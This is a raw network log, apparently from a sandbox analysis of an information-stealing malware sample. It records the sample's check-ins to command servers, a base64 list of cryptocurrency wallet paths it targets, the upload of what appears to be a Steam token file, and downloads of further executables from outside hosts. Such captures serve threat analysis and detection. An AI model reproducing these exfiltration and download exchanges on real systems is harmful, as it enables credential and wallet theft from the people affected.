Nov 26, 2024 00:25:50.564971924 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCBKKJDHJJJKECGIII Host: 185.215.113.206 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Nov 26, 2024 00:25:51.684895039 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:51.862889051 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEB Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="message"wallets------EHJKFCGHIDHCBGDHJKEB--
Nov 26, 2024 00:25:52.311644077 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:52 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 26, 2024 00:25:52.316318035 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJE Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"files------AAKJEGCFBGDHJJJJJKJE--
Nov 26, 2024 00:25:52.766527891 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:52.838419914 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file"------KEBGHCBAEGDHIDGCBAEC--
Nov 26, 2024 00:25:53.776618958 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:53.840411901 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="message"ybncbhylepme------HIIEGHJJDGHCAKEBGIJK--
Nov 26, 2024 00:25:54.289798021 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49930	185.215.113.16	80	4592	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:25:54.415865898 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 26, 2024 00:25:55.803755045 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 25 Nov 2024 23:25:55 GMT Content-Type: application/octet-stream Content-Length: 1951744 Last-Modified: Mon, 25 Nov 2024 23:19:44 GMT Connection: keep-alive ETag: "67450610-1dc800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 30 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0M@`M7@WkDMdM @.rsrcD@.idata @ +@zmgocjctp2@whbetzff M@.taggant00M"@
Nov 26, 2024 00:25:55.803780079 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:25:55.803791046 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:25:55.803865910 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2024 00:25:55.803877115 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ;,#<;T/]qYhcl,`?!
Nov 26, 2024 00:25:55.803886890 CET	1236	IN	Data Raw: 91 8d 98 5e 59 c8 8b 80 69 29 27 ac a2 99 93 f3 1e b8 ec cc 9e d4 e3 96 ef 7c 1d 0c 80 4d ca 94 de d8 27 d8 8d 70 4e d5 66 c8 7f ef 73 af a2 fc 6a 7a 3f c8 8f dc 6e 91 4e cb f2 a9 5e db 87 74 32 d4 b3 0d 81 db 6f 63 b3 b8 57 07 a3 84 0e 93 6f fc Data Ascii: ^Yi)'\|M'pNfsjz?nN^t2ocWo?02&inR8,st\|!x<\^<,M'hlEpB/t<-e:S.<#(C>!?nR9X,L!WTS~K
Nov 26, 2024 00:25:55.803898096 CET	1236	IN	Data Raw: 5c 28 a9 eb a1 9f 67 7e a4 04 47 10 b8 01 f4 3a 19 fa aa b7 93 fc 97 b8 31 3b e2 04 ee 53 9c 31 58 18 82 39 13 72 47 ca 50 b9 8c 42 23 fb d3 69 16 b6 ec a2 c3 aa 53 a8 43 3f a5 57 20 0e dd 2d 2c fe ef e1 66 84 d0 72 83 11 87 be 84 9b ad 58 0a c8 Data Ascii: \(g~G:1;S1X9rGPB#iSC?W -,frXaZtdrZq&[AsjB[4qcaGI;Z:U1qh[K0e@'8d}n\|cHfOuzu.e\|T-A!^^%+w8:2x
Nov 26, 2024 00:25:55.804003000 CET	1236	IN	Data Raw: 43 fc ba c6 44 39 f9 5c ed 38 7e 53 62 b2 ec f7 30 cb ed 60 e6 43 e6 ef 41 33 ef c0 84 6b 26 eb 73 5b 3f 80 e2 26 18 1d 59 61 d9 b2 00 63 05 90 69 19 ad 58 7d ff ec cd a0 3e 46 fe 82 75 6b 90 e9 02 51 6c b1 d7 80 69 b6 78 6a f0 69 3c 9f cc 71 fc Data Ascii: CD9\8~Sb0`CA3k&s[?&YaciX}>FukQlixji<qPu,YS0&cp}yoQEby0OCt)#Fk3WZto`]K.h\|cM,\XM<\vv/D;VaW*CogvKtw9.,;y<
Nov 26, 2024 00:25:55.804013014 CET	1236	IN	Data Raw: 1d de 8f f2 eb 90 03 e1 74 b4 0d bc 7f 59 e1 6c 44 fd 02 64 d1 27 2b eb a0 46 3c 6c 42 cc fd 64 90 e3 63 72 2e 67 5c 05 1d 4a ff e5 5b 2c 22 00 51 3c ec 20 45 7a 83 ba e6 7f e6 d6 7f 99 1e 10 a8 44 ca b4 03 3e 23 f0 80 a1 4b fc e0 7c 92 7c 93 0d Data Ascii: tYlDd'+F<lBdcr.g\J[,"Q< EzD>#K\|\|XcpiJ\%T$!7'q6"nWOUmYtac/=%x95,wuI ^}l_{>_u>PGFgt"-j!ZS5$_Gi
Nov 26, 2024 00:25:55.804023027 CET	1236	IN	Data Raw: 31 95 25 26 73 9f 0d 73 fc 31 d8 48 8d 02 06 9f 23 3b 6d 35 5a 07 7c c4 e6 36 0e b9 f9 02 0c 71 d7 76 09 c3 5b 1b 1f b7 6d c9 da f3 3d b7 ea db b3 9c 2b 0c c1 3c c4 ac 55 57 29 01 ba a7 19 ae 02 fb e7 2a f5 8c 64 5b b8 85 68 bb de 58 2c 54 bd 11 Data Ascii: 1%&ss1H#;m5Z\|6qv[m=+<UW)*d[hX,TY;'mEN~c 2HlXe.wU-NMapFod>X$srf\|,E$J+_aQgm6(P
Nov 26, 2024 00:25:55.925622940 CET	1236	IN	Data Raw: 11 2a 93 b4 41 2f 5b a6 ce fc 18 5c b0 81 2c 8e ee 7d 7f f4 66 45 b4 7a 14 bd ea d3 44 f7 5d 75 19 e1 5e bf 1e f2 a7 64 63 58 c3 64 a3 7b cf 79 24 9d d8 20 66 16 3c 42 6b 4e e3 8b d2 c8 21 66 e3 e0 32 1f d3 e3 c2 ad 32 80 07 f2 62 eb 79 e4 a1 f1 Data Ascii: *A/[\,}fEzD]u^dcXd{y$ f<BkN!f22byzS=V[V;u6A,T`<:K7'kq+l$:QloQGu}FN9i%'\9M(z0(9G"yxdK'20k97`G$!w&m]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49950	185.215.113.206	80	4592	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:25:59.669187069 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGIJDGCAEBFIIECAKFHI--
Nov 26, 2024 00:26:01.557594061 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:26:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50101	185.215.113.43	80	1208	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:27:04.919383049 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 26, 2024 00:27:06.296401024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 25 Nov 2024 23:27:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50108	185.215.113.43	80	1208	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:27:07.927406073 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 34 32 45 37 33 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B42E73B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 26, 2024 00:27:09.336100101 CET	938	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 25 Nov 2024 23:27:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 65 62 0d 0a 20 3c 63 3e 31 30 30 39 31 34 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 39 31 34 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 39 30 37 66 34 38 62 31 62 36 31 33 63 35 64 32 39 66 32 35 35 66 32 64 34 64 34 65 39 65 32 66 64 66 62 63 66 37 30 38 35 34 66 34 30 62 31 35 32 65 30 30 33 34 30 34 35 34 37 39 64 64 66 66 30 35 37 65 35 66 62 38 35 35 31 37 66 62 32 32 66 37 37 61 64 30 64 63 33 38 61 32 37 38 66 33 62 65 35 36 35 62 39 32 64 66 62 34 36 34 32 36 64 66 33 37 65 32 32 37 35 62 65 62 33 30 36 64 39 34 30 63 63 63 62 65 66 30 65 61 62 38 64 32 66 36 66 39 35 30 32 62 62 23 31 30 30 39 31 34 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 [TRUNCATED] Data Ascii: 2eb <c>1009141001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1009146001+++b5937c1ad0c0f9c34907f48b1b613c5d29f255f2d4d4e9e2fdfbcf70854f40b152e0034045479ddff057e5fb85517fb22f77ad0dc38a278f3be565b92dfb46426df37e2275beb306d940cccbef0eab8d2f6f9502bb#1009147001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc21618e605b4191d0354afead23781b89a5536e6#1009148001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1009149001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1009150001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1009151001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50112	31.41.244.11	80	1208	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:27:09.461080074 CET	54	OUT	GET /files/random.exe HTTP/1.1 Host: 31.41.244.11
